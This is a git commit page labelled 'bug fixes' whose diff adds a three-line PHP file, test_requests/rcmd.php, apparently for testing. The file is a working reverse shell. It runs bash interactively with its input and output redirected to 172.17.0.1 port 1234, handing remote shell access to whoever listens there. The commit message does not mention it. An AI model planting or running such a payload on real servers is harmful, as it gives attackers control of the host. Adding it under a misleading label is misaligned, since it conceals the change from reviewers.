bug fixes

This commit is contained in:
Pin
2022-03-08 22:50:24 -05:00
parent 52f01b6c69
commit 3b8405361c
8 changed files with 53 additions and 11 deletions

3
test_requests/rcmd.php Normal file
View File

@@ -0,0 +1,3 @@
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/172.17.0.1/1234 0>&1'");
?>